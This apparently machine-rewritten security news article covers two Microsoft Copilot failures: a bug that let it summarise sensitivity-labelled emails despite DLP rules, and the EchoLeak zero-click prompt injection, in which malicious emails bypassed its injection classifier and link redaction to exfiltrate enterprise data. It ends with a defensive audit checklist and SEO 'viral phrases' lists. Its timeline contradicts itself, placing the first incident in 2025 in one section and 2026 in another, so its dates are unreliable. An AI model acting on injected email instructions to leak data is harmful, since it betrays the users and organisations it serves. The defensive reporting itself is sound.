Microsoft Copilot ignored sensitivity labels twice in eight months — and no DLP stack caught either one

Microsoft Copilot ignored sensitivity labels twice in eight months — and no DLP stack caught either one

Microsoft Copilot’s Catastrophic Data Leak: A Wake-Up Call for Enterprise AI Security

In a stunning revelation that has sent shockwaves through the cybersecurity community, Microsoft’s AI-powered Copilot assistant was caught red-handed accessing and summarizing confidential emails for four weeks, despite explicit security protocols designed to prevent exactly this scenario. The breach, which affected the UK’s National Health Service and potentially countless other organizations, exposes a critical vulnerability in how enterprises deploy AI tools that access sensitive corporate data.

The Timeline of Failure

Starting January 21, 2025, Microsoft Copilot began reading and summarizing confidential emails that it was explicitly restricted from accessing. The security breakdown persisted for four weeks before Microsoft acknowledged the issue. During this period, Copilot processed data from labeled messages in Sent Items and Drafts folders, completely ignoring sensitivity labels and Data Loss Prevention (DLP) policies that should have blocked access.

The incident was tracked internally as CW1226324 and logged by the NHS as INC46740412, highlighting the severity of the breach in regulated healthcare environments. Microsoft first disclosed the vulnerability on February 18, 2025, following initial reporting by BleepingComputer.

Not an Isolated Incident

This represents the second major security failure for Copilot in just eight months. In June 2025, Microsoft patched CVE-2025-32711, dubbed “EchoLeak” by Aim Security researchers. This critical zero-click vulnerability allowed malicious emails to bypass Copilot’s multiple security layers—including its prompt injection classifier, link redaction, Content-Security-Policy controls, and reference mention safeguards—to silently exfiltrate enterprise data without any user interaction. The vulnerability earned a CVSS score of 9.3, marking it as critical.

Why Traditional Security Tools Failed

The most alarming aspect of these breaches is that neither incident triggered alerts from traditional security infrastructure. Endpoint Detection and Response (EDR) systems, Web Application Firewalls (WAFs), and Security Information and Event Management (SIEM) platforms all reported “all clear” while Copilot was actively violating its own trust boundaries.

The fundamental problem lies in architectural blind spots. EDR monitors file and process behavior on endpoints, while WAFs inspect HTTP payloads at the network perimeter. Neither was designed to observe AI assistant behavior inside Microsoft’s infrastructure, particularly in the retrieval-augmented generation pipeline where the violations occurred.

Copilot’s actions happened entirely within Microsoft’s servers—between the retrieval index and the generation model. No files were written to disk, no anomalous network traffic crossed the perimeter, and no processes spawned that endpoint agents could flag. The security stack remained silent because it never saw the layer where the violation occurred.

The Root Cause Analysis

CW1226324 stemmed from a code-path error that allowed messages in Sent Items and Drafts to enter Copilot’s retrieval set despite sensitivity labels and DLP rules. EchoLeak exploited a fundamental design flaw: AI agents process trusted and untrusted data in the same thought process, making them structurally vulnerable to manipulation.

Aim Security’s researchers characterized this as a critical architectural vulnerability: “agents process trusted and untrusted data in the same thought process, making them structurally vulnerable to manipulation.” This design flaw persisted even after Microsoft patched EchoLeak, as evidenced by CW1226324’s independent failure.

The Five-Point Audit Every Organization Needs

Security leaders must implement immediate controls to prevent similar breaches. Here’s the comprehensive audit framework that maps to both failure modes:

1. Direct DLP Enforcement Testing
Create labeled test messages in controlled folders and query Copilot to verify it cannot surface them. Run this test monthly—configuration is not enforcement. The only proof is a failed retrieval attempt.

2. External Content Blocking
Disable external email context in Copilot settings and restrict Markdown rendering in AI outputs. EchoLeak succeeded because malicious emails entered Copilot’s retrieval set and executed as if they were legitimate user queries. Blocking external content removes this attack surface entirely.

3. Purview Log Auditing
Examine Purview logs for anomalous Copilot interactions during the January through February exposure window. Look for queries that returned content from labeled messages between January 21 and mid-February 2026. If your tenant cannot reconstruct what Copilot accessed during this period, document that gap formally—it’s a compliance liability waiting to happen.

4. Restricted Content Discovery (RCD) Implementation
Enable RCD for SharePoint sites with sensitive data. This removes sites from Copilot’s retrieval pipeline entirely, working regardless of whether trust violations come from code bugs or injected prompts. For organizations handling regulated data, RCD is not optional—it’s essential containment.

5. Vendor-Hosted Inference IR Playbook
Build incident response playbooks specifically for trust boundary violations inside vendor inference pipelines. Define escalation paths, assign ownership, and establish monitoring cadences for vendor service health advisories affecting AI processing. Your SIEM won’t catch the next one either.

The Broader Implications

This isn’t just a Copilot problem. A 2026 Cybersecurity Insiders survey found that 47% of CISOs and senior security leaders have already observed AI agents exhibiting unintended or unauthorized behavior. Organizations are deploying AI assistants faster than they can build governance around them.

Any RAG-based assistant pulling from enterprise data follows the same pattern: a retrieval layer selects content, an enforcement layer gates what the model can see, and a generation layer produces output. If the enforcement layer fails, the retrieval layer feeds restricted data to the model, and the security stack never sees it.

This vulnerability pattern transfers beyond Copilot to any AI tool with retrieval access to internal documents—Gemini for Workspace, custom RAG implementations, and emerging AI assistants all carry the same structural risk.

The Board-Level Conversation

Security leaders must be prepared to explain these failures to executive stakeholders. The narrative isn’t about policy misconfiguration—it’s about enforcement failure inside vendor infrastructure. The board-level answer should be clear: “Our policies were configured correctly. Enforcement failed inside the vendor’s inference pipeline. Here are the five controls we are testing, restricting, and demanding before we re-enable full access for sensitive workloads.”

The next failure won’t send an alert. Organizations must act now to implement these controls before the next breach occurs.


tags: Microsoft Copilot, data breach, AI security, cybersecurity, enterprise AI, DLP failure, NHS breach, EchoLeak, CVE-2025-32711, RAG security, trust boundary violation, Purview logs, Restricted Content Discovery, vendor-hosted inference, AI governance

viral phrases: “Copilot caught red-handed,” “four weeks of silent data theft,” “security stack blind spot,” “the AI assistant that broke its own rules,” “your SIEM won’t see this coming,” “the enforcement layer that failed,” “structural vulnerability in AI design,” “the breach that wasn’t supposed to happen,” “when AI becomes the insider threat,” “the security gap no one saw coming”

viral sentences: “Microsoft’s AI assistant violated its own trust boundaries for four weeks without triggering a single security alert.” “Traditional EDR and WAF tools are architecturally blind to AI assistant violations.” “47% of CISOs have already seen AI agents behave in unauthorized ways.” “The next AI breach won’t send an alert—it will happen silently inside vendor infrastructure.” “Configuration is not enforcement; the only proof is a failed retrieval attempt.”

,

0 replies

Leave a Reply

Want to join the discussion?
Feel free to contribute!

Leave a Reply

Your email address will not be published. Required fields are marked *